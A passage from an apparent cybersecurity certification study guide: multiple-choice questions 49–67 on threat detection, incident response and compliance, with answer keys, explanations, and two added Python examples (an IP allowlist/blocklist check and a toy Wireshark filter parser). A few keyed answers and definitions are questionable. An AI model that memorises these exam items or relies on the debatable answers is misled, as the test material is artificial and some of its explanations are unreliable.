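The following is an added example, not part of the book’s explanations, that puts the two access control methods from Questions 45 and 48 side by side as an IP-based check an application can run before serving a request: an allowlist (whitelist) that denies unless the client is listed, and a blocklist (blacklist) that allows unless the client is listed. The policy class, the address ranges (taken from the documentation-only ranges 203.0.113.0/24, 198.51.100.0/24, 192.0.2.0/24 and 2001:db8::/32) and the `permits()` method are constructed for this example. In both modes a malformed address is denied, so the check fails closed.

```python
"""IP-based allowlisting versus blocklisting as a request-time access check."""
import ipaddress
from typing import Iterable


class IpAccessPolicy:
    def __init__(self, mode: str, entries: Iterable[str]):
        if mode not in ("allowlist", "blocklist"):
            raise ValueError("mode must be 'allowlist' or 'blocklist'")
        self.mode = mode
        # Entries may be single addresses or CIDR ranges; strict=False lets a
        # range be written with host bits set (e.g. 203.0.113.70/27).
        self.networks = [ipaddress.ip_network(e, strict=False) for e in entries]

    def matches(self, ip: str) -> bool:
        """True if `ip` falls inside any listed address or range.
        Raises ValueError for a string that is not an IP address."""
        addr = ipaddress.ip_address(ip)
        return any(addr in net for net in self.networks
                   if net.version == addr.version)

    def permits(self, ip: str) -> bool:
        """Allowlist: deny unless listed. Blocklist: allow unless listed.
        Unparseable input is denied in both modes (fail closed)."""
        try:
            listed = self.matches(ip)
        except ValueError:
            return False
        return listed if self.mode == "allowlist" else not listed


# Constructed policies.
# Question 48: a corporate app reachable only from selected employee addresses.
corporate = IpAccessPolicy("allowlist",
                           ["203.0.113.10", "203.0.113.64/27", "2001:db8:1::/48"])
# Question 45: a public app that turns away ranges seen attacking it.
public_app = IpAccessPolicy("blocklist", ["198.51.100.0/24", "192.0.2.77"])


def check(policy: IpAccessPolicy, ip: str) -> str:
    return "allow" if policy.permits(ip) else "deny"


if __name__ == "__main__":
    for ip in ("203.0.113.10", "203.0.113.70", "203.0.113.96", "2001:db8:1::5", "x"):
        print(f"corporate  {ip:>14}: {check(corporate, ip)}")
    for ip in ("203.0.113.10", "198.51.100.200", "192.0.2.77", "192.0.2.78"):
        print(f"public_app {ip:>14}: {check(public_app, ip)}")
```

The two modes differ in what happens when the list is incomplete: an allowlist that is missing an entry blocks a legitimate employee, which is noticed and fixed, whereas a blocklist that is missing an entry admits the attacker silently. That is why the book recommends the allowlist for a non-public corporate application and the blocklist only for a service that must stay open to the public.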
Question 49. Which of the following methods should you use to deal with the huge volume of new threats seen daily?
(A) Intrusion detection system
(B) Network access control
(C) Heuristics analysis
(D) Intrusion prevention system

Explanation 49. Heuristics analysis is the correct answer. Heuristic analysis is a method of detecting viruses by examining code for suspicious properties.

Traditional methods of virus detection involve identifying malware by comparing code in a program to the code of known virus types that have already been encountered, analyzed, and recorded in a database – known as signature detection.

Intrusion detection system is incorrect. An intrusion detection system (IDS) is a device or software application that monitors a network or systems for malicious activity or policy violations.

Network access control is incorrect. Network access control is the act of keeping unauthorized users and devices out of a private network. Organizations that give certain devices or users from outside of the organization occasional access to the network can use network access control to ensure that these devices meet corporate security compliance regulations.

Intrusion prevention system is incorrect. An intrusion prevention system (IPS) is a form of network security that works to detect and prevent identified threats. Intrusion prevention systems continuously monitor your network, looking for possible malicious incidents and capturing information about them.

Question 50. Which of the following actions should you perform to reduce the attack surface area of a given network or system? (Choose all that apply.)
(A) Keep your software up to date
(B) Run a local firewall and don’t open ports you don’t need
(C) Run applications as root or as an administrator
(D) Use TLS for all network communication, even internally
(E) Don't sanitize configurations and inputs

Explanation 50. The correct answers are:
1. Keep your software up to date
2. Run a local firewall and don’t open ports you don’t need
3. Use TLS for all network communication, even internally

An attack surface is simply the number of possible ways an attacker can get into a device or network and extract data. Always keep your software up to date. New vulnerabilities are found constantly and, unless they are zero-day exploits that you can’t prevent, the overwhelming majority of hacks make use of older software that simply wasn’t updated.

Run a local firewall and don’t open ports you don’t need. Even when you’re not on the internet, there is no reason to allow everything into the machine. If an attacker (or insider threat) has access to one host on your network, it should be hard for them to move laterally to other assets.

Use TLS for all network communication, even internally. An insider threat or compromised machine could read any unencrypted data sent on that network. A self-signed certificate is much better than no certificate.

CHAPTER 4
INCIDENT RESPONSE

Questions 51-65

Question 51. Your co-worker Jax is constantly complaining about the slow network performance on his workstation. Which of the following are common activities that cause bandwidth problems on Jax’s network? (Choose all that apply.)
(A) Streaming videos
(B) Large file transfers between computers
(C) Mobile data is on
(D) Downloading files from the internet
(E) Wireless SSID is hidden

Question 52. Which of the following categories would contain information that can be used to identify a specific individual, such as social security numbers and phone numbers?
(A) Personally identifiable information
(B) Personal health information
(C) Sensitive personal information
(D) Intellectual property

Question 53. A company follows a data retention policy, a framework of rules for holding, storing, and deleting the information it generates. The company’s policy states that accounting-related data is stored for a period of 3 years before permanent deletion. Which of the following processes does the company follow to destroy the data?
(A) Sanitization
(B) Secure disposal
(C) Patching
(D) Downtime

Question 54. Wireshark is a command-line utility that allows you to capture and analyze network traffic going through your system. It is often used to help troubleshoot network issues, as well as a security tool. (TRUE/FALSE)
(A) TRUE
(B) FALSE

Question 55. You have been hired to investigate activity from an attacker who compromised a host on the company’s network. The attacker used credentials from an employee to breach the system. After a while, he gained access to a Linux server and started using sudo commands to perform malicious activities. What sort of attack did the attacker use?
(A) Pharming
(B) Authentication Hijacking
(C) Injection Attacks
(D) Privilege escalation

Question 56. Which of the following processes describes how long businesses need to keep a piece of information (a record), where it’s stored, and how to dispose of the record when it’s time?
(A) Disaster recovery plan
(B) Business continuity plan
(C) Incident response team
(D) Retention policy

Question 57. An information system that is so critical to an organization that its corruption, or loss of access to it, would have a serious impact on the organization’s ability to conduct business is known as?
(A) High-Value Asset
(B) Data exfiltration
(C) Legal hold
(D) Security procedure

Question 58. Which of the following categories would contain information about an individual’s biometric data, genetic information, and sexual orientation?
(A) Personally identifiable information
(B) Personal health information
(C) Sensitive personal information
(D) Intellectual property

Question 59. One station on the network notifies the other stations on the network, in a ring fashion, when they are not receiving the transmission signals, with the aim of self-repairing network problems. This process is known as?
(A) Beaconing
(B) Data loss prevention
(C) Blacklisting
(D) Whitelisting

Question 60. The IT team of a company has just implemented a bandwidth monitoring solution to identify alarming and sudden spikes in their network traffic. What might be the cause of the unusual network spikes in their network? (Choose all that apply.)
(A) Remote backup tools
(B) Malware outbreaks
(C) DNS server issues
(D) Mail server problems
(E) WiFi interference

Question 61. A cybersecurity analyst follows an incident response plan to remediate a threat. After eradicating the malware from a victimized system, which of the following actions should the analyst perform NEXT as part of the recovery process?
(A) Reconstitution of resources
(B) Restoration of capabilities and services
(C) Restoration of permissions
(D) Verification of logging

Question 62. Which of the following categories would contain information about an individual’s demographic information, medical histories, laboratory results, and mental health conditions?
(A) Personally identifiable information
(B) Personal health information
(C) Sensitive personal information
(D) Intellectual property

Question 63. Your company is using Wireshark as a network protocol analyzer. The workstation with an IP address of 192.168.0.6 consumes too much bandwidth from the network without an obvious reason. Which of the following display filters should you use to display packets to or from the IP address 192.168.0.6?
(A) ip.addr=192.168.0.6
(B) ip.dst==192.168.0.6
(C) ip.addr==192.168.0.6
(D) ip.src==192.168.0.6

Question 64. The private IP range of the accounting department is 192.168.0.5 – 192.168.0.10. The hosts with IP addresses 192.168.0.7 and 192.168.0.9 aren’t able to connect to examsdigest.com by its domain name but only by its public IP address (145.34.2.7). Which of the following tools should you use to find out whether these hosts have port 54 open?
(A) Sanitization
(B) Reverse engineering
(C) Sweep scan
(D) Endpoint detection and response

Question 65. Your co-worker Marie sent you the following screenshot. She states that each time she starts her workstation, RAM usage reaches 90% – 99% and the error “Your computer is low on memory” pops up. Which of the following might be the cause of high memory usage? (Choose all that apply.)
(A) Insufficient disk space
(B) Network Interface Controller issues
(C) Startup programs
(D) A USB port is open
(E) Defective program design

Answers 51-65

Question 51. Your co-worker Jax is constantly complaining about the slow network performance on his workstation. Which of the following are common activities that cause bandwidth problems on Jax’s network? (Choose all that apply.)
(A) Streaming videos
(B) Large file transfers between computers
(C) Mobile data is on
(D) Downloading files from the internet
(E) Wireless SSID is hidden

Explanation 51. The correct answers are:
1. Streaming videos
2. Large file transfers between computers
3. Downloading files from the internet

Bandwidth issues can almost always be traced to one or two specific activities. These activities almost always have two characteristics: large amounts of data, and extended duration. Common activities causing bandwidth problems are:
- Watching videos from the Internet (YouTube, Netflix)
- Large file transfers between computers (greater than 100 megabytes in size)
- A constant stream of data (surveillance footage from security cameras)
- Downloading files from the internet

All of the above can contribute greatly to bandwidth issues in a network and should be done only when network traffic is light. Large file transfers or data streams within a network should be placed on a separate network, in order to avoid bottlenecking other users.

Question 52. Which of the following categories would contain information that can be used to identify a specific individual, such as social security numbers and phone numbers?
(A) Personally identifiable information
(B) Personal health information
(C) Sensitive personal information
(D) Intellectual property

Explanation 52. Personally identifiable information is the correct answer. Personally identifiable information (PII) is any data that can be used to identify a specific individual. Social Security numbers, mailing or email addresses, and phone numbers have most commonly been considered PII, but technology has expanded the scope of PII considerably. It can include an IP address, login IDs, social media posts, or digital images. Geolocation, biometric, and behavioral data can also be classified as PII.

Protected health information is incorrect. Protected health information (PHI), also referred to as personal health information, generally refers to demographic information, medical histories, test and laboratory results, mental health conditions, insurance information, and other data that a healthcare professional collects to identify an individual and determine appropriate care.

Sensitive Personal Information is incorrect. Sensitive Personal Information (SPI) refers to information that does not identify an individual, but is related to an individual, and communicates information that is private or could potentially harm an individual should it be made public. This includes things like biometric data, genetic information, sex, trade union membership, sexual orientation, etc.

Intellectual property is incorrect. Intellectual property (IP) is a term for any intangible asset — something proprietary that doesn’t exist as a physical object but has value. Examples of intellectual property include designs, concepts, software, inventions, trade secrets, formulas, and brand names, as well as works of art. Intellectual property can be protected by copyright, trademark, patent, or other legal measures.

Question 53. A company follows a data retention policy, a framework of rules for holding, storing, and deleting the information it generates. The company’s policy states that accounting-related data is stored for a period of 3 years before permanent deletion. Which of the following processes does the company follow to destroy the data?
(A) Sanitization
(B) Secure disposal
(C) Patching
(D) Downtime

Explanation 53. Sanitization is the correct answer. Data sanitization is the process of deliberately, permanently, and irreversibly removing or destroying the data stored on a memory device to make it unrecoverable. A device that has been sanitized has no usable residual data, and even with the assistance of advanced forensic tools, the data will not ever be recovered.

Secure disposal is incorrect. Secure data disposal includes securely disposing of data from a device, but not getting rid of the data entirely. When you dispose of data (i.e. putting it in the trash or simply deleting files off of your computer), the data can still be accessed by individuals.

Patching is incorrect. Patches are software and operating system (OS) updates that address security vulnerabilities within a program or product.

Downtime is incorrect. Downtime or outage duration refers to a period of time that a system fails to provide or perform its primary function.

Question 54. Wireshark is a command-line utility that allows you to capture and analyze network traffic going through your system. It is often used to help troubleshoot network issues, as well as a security tool. (TRUE/FALSE)
(A) TRUE
(B) FALSE

Explanation 54. The correct answer is FALSE. Wireshark is indeed a tool that captures and analyzes network traffic that goes through your system, but it is not a command-line utility.

Wireshark is the world's leading network traffic analyzer and an essential tool for any security professional or systems administrator. It lets you analyze network traffic in real time, and is often the best tool for troubleshooting issues on your network.

Tcpdump is a command-line utility that allows you to capture and analyze network traffic going through your system. It is often used to help troubleshoot network issues, as well as a security tool.

Question 55. You have been hired to investigate activity from an attacker who compromised a host on the company's network. The attacker used credentials from an employee to breach the system. After a while, he gained access to a Linux server and started using sudo commands to perform malicious activities. What sort of attack did the attacker use?
(A) Pharming
(B) Authentication Hijacking
(C) Injection Attacks
(D) Privilege escalation

Explanation 55. Privilege escalation is the correct answer. Privilege escalation happens when a malicious user exploits a bug, design flaw, or configuration error in an application or operating system to gain elevated access to resources that should normally be unavailable to that user.

The attacker can then use the newly gained privileges to steal confidential data, run administrative commands or deploy malware, and potentially do serious damage to your operating system, server applications, organization, and reputation.

Pharming is incorrect. Pharming is a cyberattack intended to redirect a website's traffic to another, fake site. Pharming can be conducted either by changing the hosts file on a victim's computer or by exploiting a vulnerability in the DNS server.

Authentication Hijacking is incorrect, as in that attack the attackers attempt to bypass or break the authentication methods that a web application is using.

Injection Attacks is incorrect, as injection attacks occur when malicious code is embedded into unsecured software.

Question 56. Which of the following processes describes how long businesses need to keep a piece of information (a record), where it's stored, and how to dispose of the record when it's time?
(A) Disaster recovery plan
(B) Business continuity plan
(C) Incident response team
(D) Retention policy

Explanation 56. Retention policy is the correct answer. A retention policy is a key part of the lifecycle of a record. It describes how long a business needs to keep a piece of information (a record), where it's stored, and how to dispose of the record when it's time.

Business continuity plan is incorrect. Business continuity planning is a strategy. It ensures continuity of operations with minimal service outage or downtime. It is designed to protect personnel or assets and make sure they can function quickly when a disaster strikes, such as a natural disaster or a cyber-attack.

Disaster recovery plan is incorrect. A business disaster recovery plan can restore data and critical applications in the event your systems are destroyed when disaster strikes.

The difference between a business continuity plan and a disaster recovery plan is this: a business continuity plan is a strategy businesses put in place to continue operating with minimal disruption in the event of a disaster. The disaster recovery plan refers more specifically to the steps and technologies for recovering from a disruptive event, especially as it pertains to restoring lost data, infrastructure failure, or other technological components.

Incident response team is incorrect. An incident response team is a group of IT professionals in charge of preparing for and reacting to any type of organizational emergency. Responsibilities of an incident response team include developing an incident response plan, testing for and resolving system vulnerabilities, maintaining strong security best practices, and providing support for all incident handling measures.

Question 57. An information system that is so critical to an organization that its corruption, or the loss of access to it, would have a serious impact on the organization's ability to conduct business is known as?
(A) High-Value Asset
(B) Data exfiltration
(C) Legal hold
(D) Security procedure

Explanation 57. High-Value Asset is the correct answer. A High-Value Asset (HVA) is information or an information system that is so critical to an organization that the loss or corruption of this information or loss of access to the system would have a serious impact on the organization's ability to perform its mission or conduct business.

Data exfiltration is incorrect. Data exfiltration is a form of security breach that occurs when an individual's or company's data is copied, transferred, or retrieved from a computer or server without authorization.

Legal hold is incorrect. A legal hold (also known as a litigation hold) is a notification sent from an organization's legal team to employees instructing them not to delete electronically stored information (ESI) or discard paper documents that may be relevant to a new or imminent legal case.

Security procedure is incorrect. A security procedure is a set sequence of necessary activities that performs a specific security task or function. Procedures are normally designed as a series of steps to be followed as a consistent and repetitive approach or cycle to accomplish an end result.

Question 58. Which of the following categories would contain information about an individual's biometric data, genetic information, and sexual orientation?
(A) Personally identifiable information
(B) Personal health information
(C) Sensitive personal information
(D) Intellectual property

Explanation 58. Sensitive Personal Information is the correct answer. Sensitive Personal Information (SPI) refers to information that does not identify an individual, but is related to an individual, and communicates information that is private or could potentially harm an individual should it be made public. This includes things like biometric data, genetic information, sex, trade union membership, sexual orientation, etc.

Personally identifiable information is incorrect. Personally identifiable information (PII) is any data that can be used to identify a specific individual. Social Security numbers, mailing or email addresses, and phone numbers have most commonly been considered PII, but technology has expanded the scope of PII considerably. It can include an IP address, login IDs, social media posts, or digital images. Geolocation, biometric, and behavioral data can also be classified as PII.

Personal health information is incorrect. Protected health information (PHI), also referred to as personal health information, generally refers to demographic information, medical histories, test and laboratory results, mental health conditions, insurance information, and other data that a healthcare professional collects to identify an individual and determine appropriate care.

Intellectual property is incorrect. Intellectual property (IP) is a term for any intangible asset: something proprietary that doesn't exist as a physical object but has value. Examples of intellectual property include designs, concepts, software, inventions, trade secrets, formulas, and brand names, as well as works of art. Intellectual property can be protected by copyright, trademark, patent, or other legal measures.

Question 59. Stations on a ring network notify the other stations on the ring when they are not receiving transmission signals, with the aim of self-repairing network problems. This process is known as?
(A) Beaconing
(B) Data loss prevention
(C) Blacklisting
(D) Whitelisting

Explanation 59. Beaconing is the correct answer. In wireless networks, a beacon is a type of frame that is sent by the access point (or WiFi router) to indicate that it is on.

Bluetooth-based beacons periodically send out a data packet, and this can be used by software to identify the beacon location. This is typically used by indoor navigation and positioning applications.

Beaconing is also the process that allows a network to self-repair network problems. The stations on the network notify the other stations on the ring when they are not receiving the transmissions. Beaconing is used in Token Ring and FDDI networks.

Data loss prevention is incorrect. Data loss prevention (DLP) is a set of tools and processes used to ensure that sensitive data is not lost, misused, or accessed by unauthorized users.

Blacklisting is incorrect. Blacklisting means accepting most entities, but excluding those you believe to be malicious or otherwise wish to avoid. Traditionally, blacklisting has been the most common approach security teams use for securing their networks or environments.

Whitelisting is incorrect. Whitelisting refers to the practice of blocking all entities except those that are explicitly allowed to communicate with you or your infrastructure. Whitelisting makes more sense in situations where you do not want a service to be public.
Question 60. The IT team of a company has just implemented a bandwidth monitoring solution to identify alarming and sudden spikes in their network traffic. What might be the cause of the unusual network spikes in their network? (Choose all that apply.)
(A) Remote backup tools
(B) Malware outbreaks
(C) DNS server issues
(D) Mail server problems
(E) WiFi interference

Explanation 60. The correct answers are:
1. Remote backup tools
2. Malware outbreaks
3. Mail server problems

There are many different causes of sudden network spikes, and you should find the root cause of any unusual bandwidth usage.

Remote Backup Tools
What applies to backups inside the LAN applies even more to remote ones. Many networks use cloud-based solutions for safeguarding their data, in most cases complementary to local backups. Uploading huge amounts of data stresses the bandwidth.

Malware outbreaks
If your traffic rises for no apparent reason, it might be a hacking attempt. Heavy cases like DDoS attacks are usually detected very quickly due to their strong and immediate impact. More subtle attacks are more difficult to reveal. By observing your bandwidth monitor, you can spot potential malware outbreaks or hacking attempts.

Mail Server Problems
Delivering and receiving mail is one of the most frequent tasks your network has to handle. Simple text-only emails or messages with small attachments usually don't stress the network much, even in large numbers. But if anything goes wrong with mail delivery, many mail servers are very persistent in trying to send out the messages over and over again.
Question 61. A cybersecurity analyst follows an incident response plan to remediate a threat. Which of the following actions should the analyst perform NEXT as part of the recovery process, after eradicating the malware from the victimized system?
(A) Reconstitution of resources
(B) Restoration of capabilities and services
(C) Restoration of permissions
(D) Verification of logging

Explanation 61. Restoration of permissions is the correct answer. An incident response plan ensures that in the event of a security breach, the right personnel and procedures are in place to effectively deal with a threat. Having an incident response plan in place ensures that a structured investigation can take place to provide a targeted response to contain and remediate the threat.

Following an incident, all types of permissions should be reviewed and reinforced. This especially affects file and firewall ACLs and system privileges assigned to administrative user or group accounts. This is performed during the recovery process/phase.
Question 62. Which of the following categories would contain information about an individual's demographic information, medical histories, laboratory results, and mental health conditions?
(A) Personally identifiable information
(B) Personal health information
(C) Sensitive personal information
(D) Intellectual property

Explanation 62. Personal health information is the correct answer. Protected health information (PHI), also referred to as personal health information, generally refers to demographic information, medical histories, test and laboratory results, mental health conditions, insurance information, and other data that a healthcare professional collects to identify an individual and determine appropriate care.

Personally identifiable information is incorrect. Personally identifiable information (PII) is any data that can be used to identify a specific individual. Social Security numbers, mailing or email addresses, and phone numbers have most commonly been considered PII, but technology has expanded the scope of PII considerably. It can include an IP address, login IDs, social media posts, or digital images. Geolocation, biometric, and behavioral data can also be classified as PII.

Sensitive Personal Information is incorrect. Sensitive Personal Information (SPI) refers to information that does not identify an individual, but is related to an individual, and communicates information that is private or could potentially harm an individual should it be made public. This includes things like biometric data, genetic information, sex, trade union membership, sexual orientation, etc.

Intellectual property is incorrect. Intellectual property (IP) is a term for any intangible asset: something proprietary that doesn't exist as a physical object but has value. Examples of intellectual property include designs, concepts, software, inventions, trade secrets, formulas, and brand names, as well as works of art. Intellectual property can be protected by copyright, trademark, patent, or other legal measures.
Question 63. Your company is using Wireshark as a network protocol analyzer. The workstation with the IP address 192.168.0.6 consumes too much bandwidth from the network without an obvious reason. Which of the following display filters should you use to display packets to or from the IP address 192.168.0.6?
(A) ip.addr=192.168.0.6
(B) ip.dst==192.168.0.6
(C) ip.addr==192.168.0.6
(D) ip.src==192.168.0.6

Explanation 63. ip.addr==192.168.0.6 is the correct answer. Wireshark provides a display filter language that enables you to precisely control which packets are displayed. Display filters can be used to check for the presence of a protocol or field, the value of a field, or even to compare two fields to each other. These comparisons can be combined with logical operators, like "and" and "or", and parentheses into complex expressions.

You can build display filters that compare values using a number of different comparison operators. For example, to only display packets to or from the IP address 192.168.0.6, use ip.addr==192.168.0.6.
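As an added example (not from the book and not Wireshark's own code), the Python below implements the subset of the display filter language the explanation describes: the comparison operators, "and"/"or"/"not" with parentheses, field-presence tests, and the ip.addr field that matches either the source or the destination address. The frame records are constructed, not a real capture; running it also shows why the single "=" in answer (A) is rejected and why ip.src and ip.dst (answers B and D) each show only one direction of the conversation.

```python
import re

# Constructed sample capture, one dict per frame; field names follow Wireshark's.
PACKETS = [
    {"frame.number": 1, "ip.src": "192.168.0.6", "ip.dst": "203.0.113.10", "tcp.port": 443, "frame.len": 1514},
    {"frame.number": 2, "ip.src": "203.0.113.10", "ip.dst": "192.168.0.6", "tcp.port": 443, "frame.len": 1514},
    {"frame.number": 3, "ip.src": "192.168.0.7", "ip.dst": "192.168.0.1", "udp.port": 53, "frame.len": 78},
    {"frame.number": 4, "ip.src": "192.168.0.1", "ip.dst": "192.168.0.7", "udp.port": 53, "frame.len": 134},
    {"frame.number": 5, "ip.src": "192.168.0.6", "ip.dst": "192.168.0.9", "tcp.port": 445, "frame.len": 66},
]
TOKEN_RE = re.compile(r"\s*(\(|\)|==|!=|>=|<=|>|<|\band\b|\bor\b|\bnot\b|[\w.]+)")
OPS = {"==": lambda a, b: a == b, "!=": lambda a, b: a != b, ">": lambda a, b: a > b,
       "<": lambda a, b: a < b, ">=": lambda a, b: a >= b, "<=": lambda a, b: a <= b}


def tokenize(expr):
    """Split a filter into tokens; a lone '=' (answer A) is rejected up front."""
    if re.search(r"(?<![=!<>])=(?!=)", expr):
        raise ValueError("'=' is not a display-filter operator; use '=='")
    tokens, pos, expr = [], 0, expr.strip()
    while pos < len(expr):
        m = TOKEN_RE.match(expr, pos)
        if m is None:
            raise ValueError(f"bad filter syntax near {expr[pos:]!r}")
        tokens.append(m.group(1))
        pos = m.end()
    return tokens


def field_values(packet, name):
    """All values a field has in this frame; ip.addr covers both ip.src and ip.dst."""
    if name == "ip.addr":
        return [packet[k] for k in ("ip.src", "ip.dst") if k in packet]
    return [packet[name]] if name in packet else []


class DisplayFilter:
    """Recursive-descent parser; precedence is or < and < not < (comparison | parens)."""

    def __init__(self, expr):
        self.tokens, self.pos = tokenize(expr), 0
        self.tree = self._expr()
        if self.pos != len(self.tokens):
            raise ValueError(f"unexpected token {self.tokens[self.pos]!r}")

    def _peek(self):
        return self.tokens[self.pos] if self.pos < len(self.tokens) else None

    def _next(self):
        self.pos += 1
        return self.tokens[self.pos - 1]   # IndexError if the filter is cut short

    def _expr(self, level=0):
        """Left-associative chain for 'or' (level 0) and 'and' (level 1)."""
        if level == 2:
            return self._unary()
        word = ("or", "and")[level]
        node = self._expr(level + 1)
        while self._peek() == word:
            self._next()
            node = (word, node, self._expr(level + 1))
        return node

    def _unary(self):
        if self._peek() == "not":
            self._next()
            return ("not", self._unary())
        tok = self._next()
        if tok == "(":
            node = self._expr()
            if self._next() != ")":
                raise ValueError("missing ')'")
            return node
        if self._peek() in OPS:                 # field <op> value
            return ("cmp", tok, self._next(), self._next())
        return ("has", tok)                     # bare field: presence test

    def matches(self, packet, node=None):
        node = node or self.tree
        kind = node[0]
        if kind == "or":
            return self.matches(packet, node[1]) or self.matches(packet, node[2])
        if kind == "and":
            return self.matches(packet, node[1]) and self.matches(packet, node[2])
        if kind == "not":
            return not self.matches(packet, node[1])
        values = field_values(packet, node[1])
        if kind == "has":
            return bool(values)
        # A multi-valued field matches if ANY value satisfies the comparison, which is
        # why 'ip.addr != X' still shows frames that merely involve X on one side.
        return any(OPS[node[2]](v, type(v)(node[3])) for v in values)


def apply_filter(expr, packets=PACKETS):
    """Frame numbers the display filter would leave visible in the packet list."""
    return [p["frame.number"] for p in packets if DisplayFilter(expr).matches(p)]


def is_valid_filter(expr):
    """True if the expression parses; the single '=' in answer (A) does not."""
    try:
        return bool(DisplayFilter(expr))
    except (ValueError, IndexError):
        return False
```

Against the constructed frames, ip.addr==192.168.0.6 keeps frames 1, 2 and 5 while ip.src and ip.dst each keep only one direction; ip.addr!=192.168.0.6 keeps every frame, the classic pitfall of negating a multi-valued field.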
Question 64. The private IP range of the accounting department is 192.168.0.5 – 192.168.0.10. The hosts with IP addresses 192.168.0.7 and 192.168.0.9 aren't able to connect to examsdigest.com by its domain name, but only by its public IP address (145.34.2.7). Which of the following tools should you use to find out if these hosts have opened port 54?
(A) Sanitization
(B) Reverse engineering
(C) Sweep scan
(D) Endpoint detection and response

Explanation 64. Sweep scan is the correct answer. A sweep scan tries to find out which hosts in the network have opened a specific port.

Sanitization is incorrect. Sanitizing removes any illegal characters from the data.

Reverse engineering is incorrect. Reverse engineering can be used to identify the details of a breach: how the attacker entered the system, and what steps were taken to breach the system.

Endpoint detection and response is incorrect. Endpoint detection and response tools work by monitoring endpoint and network events and recording the information in a central database where further analysis, detection, investigation, reporting, and alerting take place. A software agent installed on the host system provides the foundation for event monitoring and reporting.
Question 65. Your co-worker Marie sent you the following screenshot. She states that each time she opens her workstation the RAM usage reaches 90% – 99% and the error "Your computer is low on memory" pops up. Which of the following might be the cause of high memory usage? (Choose all that apply.)

(A) Insufficient disk space
(B) Network Interface Controller issues
(C) Startup programs
(D) A USB port is open
(E) Defective program design

Explanation 65. The correct answers are:
1. Insufficient disk space
2. Startup programs
3. Defective program design

Windows 10 high memory usage is usually related to RAM and virtual memory. Although memory is tightly connected with the CPU and hard drive, the high memory usage problem still differs from high CPU usage and high disk usage problems.

If the computer has a high memory usage problem, it will freeze (especially when a large program like a game is running). Sometimes, it will result in the "Your computer is low on memory" error popping up.

The reasons that may cause high memory usage are various, but the common causes are as follows.
- Running too many programs at the same time.
- Registry hack.
- Defective program design.
- Startup programs.
- Insufficient disk space.
- Virus or antivirus.
- Other causes.
CHAPTER 5
COMPLIANCE AND ASSESSMENT

Questions 66-75
Question 66. Which of the following statements describes the difference between security and privacy?
(A) Security is about the safeguarding of user identity, whereas privacy is about the safeguarding of data
(B) Security is about the safeguarding of data and user identity, whereas privacy is about the safeguarding of data
(C) Security is about the safeguarding of data, whereas privacy is about the safeguarding of user identity
(D) Security is about the safeguarding of data, whereas privacy is about the safeguarding of data and user identity

Question 67. A company signs a new contract with an Internet service provider (ISP). The ISP presents a document which states that the company agrees to adhere to stipulations such as:

- Not using the service as part of violating any law
- Not attempting to break the security of any computer network or user
- Not posting commercial messages to Usenet groups without prior permission
- Not attempting to send junk e-mail or spam to anyone who doesn't want to receive it
- Not attempting to mail bomb a site with mass amounts of e-mail in order to flood their server

Which of the following documents is described in the above scenario?
(A) General Data Protection Regulation
(B) National Institute of Standards and Technology
(C) International Organization for Standardization
(D) Acceptable Use Policy

Question 68. A company collects information from customers in all possible ways through the web. Afterwards, the company separates the information based on demographics and interests and resells the customers' data to third-party companies in different countries. Which of the following concepts does the company violate?
(A) Data masking
(B) Data enrichment
(C) Data sovereignty
(D) Data exfiltration
Question 69. Your organization is working with a contractor to build a database. You need to find a way to hide the actual data from being exposed to the contractor. Which of the following techniques will you use in order to allow the contractor to test the database environment without having access to actual sensitive customer information?
(A) Data masking
(B) Tokenization
(C) Encryption
(D) Data at rest

Question 70. An author just published his new eBook on Amazon, but he worries about copyright issues, as his previous eBook was found on file-sharing websites. The author wants to prevent users from sharing his content online. Which of the following tools allows the author to prevent unauthorized use of his content?
(A) NDA
(B) DRM
(C) DLP
(D) AUP
Question 71. A company hired an outside contractor to oversee a cyber defense competition and adjudicate the event. Which of the following cybersecurity testing exercise teams has MOST likely been hired?
(A) Red team
(B) Blue team
(C) White team
(D) Purple team
Question 72. You have been hired as a penetration tester for conducting an assessment. The company wants to include ONLY cross-site scripting and SQL injection in the list of authorized activities. Which of the following documents would include this limitation?
(A) Non-Disclosure Agreement
(B) Code of Conduct
(C) Rules of Engagement
(D) Acceptable Use Policy
Question 73. If an employee tried to forward a business email outside the corporate domain or upload a corporate file to a consumer cloud storage service like Google Drive, the employee would be denied permission. Which of the following processes is described in the above scenario?
(A) Non-disclosure Agreement
(B) Data Loss Prevention
(C) Digital Rights Management
(D) Tokenization
Question 74. Your agency has received various complaints about slow Internet access and that your web site is inaccessible. After further investigation, it is determined that your agency is the victim of a DNS amplification attack that is currently overwhelming your DNS server and network bandwidth. An overwhelmingly large number of spoofed Internet IP addresses are involved in the attack. The above scenario can be considered a tabletop exercise. (TRUE/FALSE)
(A) TRUE
(B) FALSE
Question 75. Which of the following statements describes the difference between the Red team and the Blue team in a cybersecurity testing exercise?
(A) A blue team imitates an attacker and attacks with characteristic tactics and techniques while a red team is there to find ways to defend against the attack
(B) A red team imitates an attacker and attacks with characteristic tactics and techniques while a blue team is there to find ways to both defend and attack
(C) A red team imitates an attacker and attacks with characteristic tactics and techniques while a blue team is there to find ways to defend against the attack
(D) A blue team imitates an attacker and attacks with characteristic tactics and techniques while a red team is there to find ways to both defend and attack
Answers 66-75

Question 66. Which of the following statements describes the difference between security and privacy?
(A) Security is about the safeguarding of user identity, whereas privacy is about the safeguarding of data
(B) Security is about the safeguarding of data and user identity, whereas privacy is about the safeguarding of data
(C) Security is about the safeguarding of data, whereas privacy is about the safeguarding of user identity
(D) Security is about the safeguarding of data, whereas privacy is about the safeguarding of data and user identity

Explanation 66. Security is about the safeguarding of data, whereas privacy is about the safeguarding of user identity is the correct answer. Security refers to protection against the unauthorized access of data. We put security controls in place to limit who can access the information.

For example, hospital and clinic staff use secure systems to communicate with patients about their health, instead of sending information via personal email accounts. This type of data transmission is an example of security. On the other hand, privacy provisions might limit patient health record access to specific hospital staff members, such as doctors, nurses, and medical assistants. Privacy might also stipulate when users can access specific information.

Question 67. A company signs a new contract with an Internet service provider (ISP). The ISP presents a document which states that the company agrees to adhere to stipulations such as:

- Not using the service as part of violating any law
- Not attempting to break the security of any computer network or user
- Not posting commercial messages to Usenet groups without prior permission
- Not attempting to send junk e-mail or spam to anyone who doesn't want to receive it
- Not attempting to mail bomb a site with mass amounts of e-mail in order to flood their server

Which of the following documents is described in the above scenario?
(A) General Data Protection Regulation
(B) National Institute of Standards and Technology
(C) International Organization for Standardization
(D) Acceptable Use Policy
Explanation 67. Acceptable Use Policy is the correct answer. An acceptable use policy (AUP) is a document stipulating constraints and practices that a user must agree to for access to a corporate network or the Internet.

